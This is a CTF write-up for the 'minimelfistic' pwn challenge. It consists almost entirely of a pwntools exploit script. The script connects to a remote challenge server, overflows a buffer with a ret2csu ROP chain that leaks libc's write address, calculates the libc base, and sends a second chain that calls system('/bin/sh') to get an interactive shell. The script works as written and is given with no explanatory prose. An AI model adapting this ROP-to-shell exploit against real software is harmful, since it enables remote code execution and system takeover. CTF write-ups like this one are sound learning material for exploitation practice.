Tags: pwn 

Rating:

### Author: Nima Dabbaghi

-----

```
#!/usr/bin/env python3

from pwn import *

elf = ELF("./minimelfistic", checksec=False)
libc = ELF("./libc.so.6", checksec=False)
#ld = ELF("./ld-2.27.so", checksec=False)

context.binary = elf
rop = ROP(elf)

context.log_level = "debug"

p = remote("134.209.186.58",30411)

# symbols
main = elf.sym.main
write_got = elf.got.write
write_plt = elf.plt.write

# gadgets
pop_rdi = 0x0000000000400a43
pop_rsi = 0x0000000000400a41
pop_csu = 0x00400a3a # pop rbx, rpb, r12,r13,r14,r15
mov_csu = 0x00400a20 # mov rdx, r15; rsi, r14; edi, r13d
ret = 0x0000000000400616

rop.raw(pop_rdi)
rop.raw(p64(1))
rop.ret2csu(1, elf.got.write, 8,1,1,1,1,1,1)
rop.raw(pop_rdi)
rop.raw(p64(1))
rop.call(elf.plt.write)
rop.call(elf.sym.main)

payload = flat({72:rop.chain()})

p.sendlineafter(b">", payload)
p.sendlineafter(b">", b"9")
p.recvline()
p.recvline()
p.recvline()
leak = u64(p.recv(6).ljust(8, b"\x00"))
info(f"Leaked libc @ {hex(leak)}")
libc.address = leak - libc.sym.write
success(f"Leaked Libc @ {hex(libc.address)}")

rop2 = ROP(libc)

binsh = next(libc.search(b"/bin/sh"))

rop2.raw(pop_rdi)
rop2.raw(binsh)
#rop2.raw(pack(0x0000000000400616))
rop2.raw(libc.sym.system)

payload2 = flat({72:rop2.chain()})

p.sendlineafter(b">", payload2)
p.sendlineafter(b">", b"9")
p.interactive()
```

Original writeup (https://novasecurity.net/).